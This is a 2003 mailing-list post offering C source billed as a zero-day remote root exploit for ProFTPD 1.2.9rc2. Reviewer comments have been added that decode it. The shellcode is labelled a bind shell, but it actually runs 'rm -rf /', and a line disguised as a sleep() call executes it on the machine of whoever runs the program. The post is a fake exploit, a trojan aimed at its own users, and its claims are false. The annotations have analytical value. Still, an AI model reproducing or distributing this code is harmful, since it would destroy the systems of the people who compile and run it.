
ProFTPD-1.2.9rc2 remote root exploit


From: "Jean-Kevin Grosnakeur" <fufeur () hotmail com>
Date: Fri, 24 Oct 2003 13:26:59 +0000

Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.

--------------------------------------------------------------------------
/*

Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>

#define NOP     0x90
/* 0x6675636b is not a plausible code address: its bytes are the ASCII
 * characters 0x66 0x75 0x63 0x6b, i.e. a four-letter word.  First hint that
 * this listing was never meant to work against the named server. */
#define RET     0x6675636b


/* NOTE(review): the original comment "x86 bind shellcode" is false.
 * Decoding the bytes below: they push "/bin/sh", "-c" and "rm -rf /" onto
 * the stack, build an argv of those three strings, call execve via int 0x80
 * and then exit.  No socket is opened.  The only place these bytes are ever
 * executed is on the LOCAL machine, by the `sleep` line in main(), so this
 * program is a trojan aimed at whoever compiles and runs it. */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);


/*
 * Entry point: builds a 1024-byte buffer, sends (part of) it to <host>:<port>,
 * then tries to connect to port 1337 on the same host via give_me_a_shell().
 *
 * NOTE(review): the line `void(*sleep)()=(void*)sc;sleep(5);` near the end
 * does not sleep.  It declares a local function pointer named `sleep`
 * (shadowing libc's sleep()) that points at the global byte array `sc` and
 * calls it -- that is, it executes the embedded bytes on the machine running
 * this program.  Decoded, those bytes execve("/bin/sh", {"/bin/sh", "-c",
 * "rm -rf /"}) and exit.  Everything before that line is decoration: the
 * send() below transmits only sizeof(char *) bytes of the payload.
 *
 * Also missing: <string.h> (memset, strlen), <netinet/in.h> (sockaddr_in,
 * htons) and <arpa/inet.h> (inet_ntoa) are used but never included, so these
 * are implicit declarations under the includes given above.
 *
 * Returns 0 on success or usage, -1 on socket/connect/send failure or when
 * the port-1337 connection fails.
 */
int main(int argc, char *argv[])
 {
  int i, *ret;                  /* `ret` is never used */
  char *string;
  unsigned long addr;
  char buffer[1024];
  int port=21, fd, s;

  struct sockaddr_in addy;      /* never zeroed; sin_zero stays uninitialised */

  if(argc < 2)
    {
     fprintf(stdout, "usage: %s <host> <port>\n", argv[0]);
     return(0);
    }

  else addr=resolve(argv[1]);
  /* argv[argc] is NULL, so this is safe when no port is given; atoi() does no range check */
  if(argv[2]) port=atoi(argv[2]);

  /* fill the whole buffer with NOP bytes -- note no terminating NUL is ever written */
  memset(buffer, NOP, 1024);

  /* copy sc to buffer[700..]; sc contains no NUL byte either */
  for(i=0; i < strlen(sc); i++)
    buffer[i+700]=sc[i];

  /* overwrite buffer[815..1002] with RET (unaligned int stores; UB-tolerant on x86) */
  for(i=815; i<1003; i+=4)
    *((int *)&buffer[i]) = RET;

  /* BUG: buffer has no NUL terminator, so strlen(buffer) reads past the
   * 1024-byte array (undefined behaviour) and the malloc size is unbounded.
   * "\x4c\x4f\x56\x45" is the ASCII text "LOVE"; no such FTP command exists. */
  string = (char *) malloc(strlen(buffer)+20);
  sprintf(string, "\x4c\x4f\x56\x45 %s", buffer);

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if(fd < 0)
    {
     fprintf(stderr, "unable to socket()\n");
     return(-1);
    }

  addy.sin_family        = AF_INET;
  addy.sin_addr.s_addr   = addr;
  addy.sin_port          = htons(port);

  /* connect to remote host */
  if(connect(fd, (struct sockaddr *)&addy, sizeof(addy)) < 0)
    {
     fprintf(stderr, "unable to connect()\n");
     return(-1);
    }

  printf("Connected on %s:%d\n", inet_ntoa(addy.sin_addr), port);
  printf("Exploitation in progress...\n");

  /* BUG: sizeof(string) is the size of a pointer, not the payload, so only
   * 4 (or 8) bytes -- "LOVE" plus at most a space and NOPs -- are sent.
   * BUG: `s = send(...) < 0` parses as `s = (send(...) < 0)`, so `s` holds
   * the comparison result; the error check still works by accident. */
  if(s = send(fd, string, sizeof(string), 0) < 0)
    {
     fprintf(stderr, "unable to send()\n");
     return(-1);
    }

  close(fd);
  printf("Exploitation string sent.\n");
  free(string);

  /* connect to the bindshell */
  printf("Trying to connect, please wait...\n");
  /* THIS IS THE PAYLOAD: calls the `sc` byte array as a function on the local
   * host (see the header comment).  The `5` is ignored.  On a system that
   * enforces non-executable data this would fault instead; on a 2003-era
   * i386 Linux box it runs. */
  void(*sleep)()=(void*)sc;sleep(5);
  if(give_me_a_shell(addr) < 0)
    {
     fprintf(stderr, "Sorry, exploit didn't work.\n");
     return(-1);
    }

  return(0);
 }


/*
 * Resolves sname to an IPv4 address in network byte order, or exits the
 * process with status 1 after printing an error when lookup fails.
 *
 * h_addr is h_addr_list[0], a `char *` to an h_length-byte address (4 for
 * AF_INET).  Reading it through `unsigned long *` reads sizeof(unsigned long)
 * bytes -- fine on 32-bit, an over-read on 64-bit hosts; the caller then
 * truncates the value back to 32 bits when assigning s_addr.
 * gethostbyname() is not reentrant and is obsolete in favour of getaddrinfo().
 */
unsigned long resolve(char *sname)
 {
  struct hostent * hip;
  hip = gethostbyname(sname);
  if (!hip)
    {
     fprintf(stderr, "unable to find %s\n",sname);
     exit(1);
    }
  return *(unsigned long *)hip -> h_addr;
 }


/*
 * Connects to TCP port 1337 on addr (network byte order), sends a fixed
 * command string, then relays between stdin and the socket until the user
 * types "quit" or an error occurs.
 *
 * Returns 0 when the user quits, -1 on socket/connect/select/recv failure.
 * Since nothing in this program actually opens port 1337 anywhere, in
 * practice this returns -1 at connect() -- if main() ever gets here at all.
 *
 * Uses select(), strlen(), strcmp() and htons() without including
 * <sys/select.h>, <string.h> or <netinet/in.h>.
 */
int give_me_a_shell(unsigned long addr)
 {
  int sock;
  fd_set fds;
  struct sockaddr_in shell;     /* never zeroed; sin_zero stays uninitialised */
  unsigned char buf[4096];
  char cmd[]="uname -a && id";

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock < 0)
    {
     fprintf(stderr, "unable to socket()\n");
     return(-1);
    }

  shell.sin_family      = AF_INET;
  shell.sin_port        = htons(1337);
  shell.sin_addr.s_addr = addr;

  /* sizeof(struct sockaddr) and sizeof(shell) are both 16 here, so this is harmless */
  if(connect(sock, (struct sockaddr *)&shell, sizeof(struct sockaddr)) < 0)
    {
     fprintf(stderr, "unable to connect()\n");
     close(sock);
     return(-1);
    }

  /* return value of send() ignored; no trailing newline is sent with the command */
  send(sock, cmd, strlen(cmd), 0);

  while(1)
    {
     FD_ZERO(&fds);
     FD_SET(0, &fds);
     FD_SET(sock, &fds);

     /* nfds should be sock+1; 255 only works while sock < 255 */
     if(select(255, &fds, NULL, NULL, NULL) == -1)
       {
        fprintf(stderr, "unable to select()\n");
        close(sock);
        return(-1);
       }

      memset(buf, 0, sizeof(buf));
      if(FD_ISSET(sock, &fds))
        {
         /* recv() == 0 (peer closed) is not handled: the socket stays readable
          * and the loop spins printing an empty string.  A full 4096-byte
          * recv leaves buf without a NUL, so the "%s" below over-reads. */
         if(recv(sock, buf, sizeof(buf), 0) < 0)
           {
            fprintf(stderr, "unable to recv()\n");
            close(sock);
            return(-1);
           }
         fprintf(stderr, "%s", buf);
        }

       if(FD_ISSET(0, &fds))
         {
          /* read() return value ignored; 0 (EOF on stdin) is not detected.
           * With line-buffered stdin the buffer holds "quit\n", which never
           * equals "quit", so this exit path is effectively unreachable. */
          read(0, buf, sizeof(buf));
          if(!strcmp(buf, "quit"))
            {
             close(sock);
             return(0);
            }
          write(sock, buf, strlen(buf));
         }
      }
 }

--------------------------------------------------------------------------

Have fun ! @+



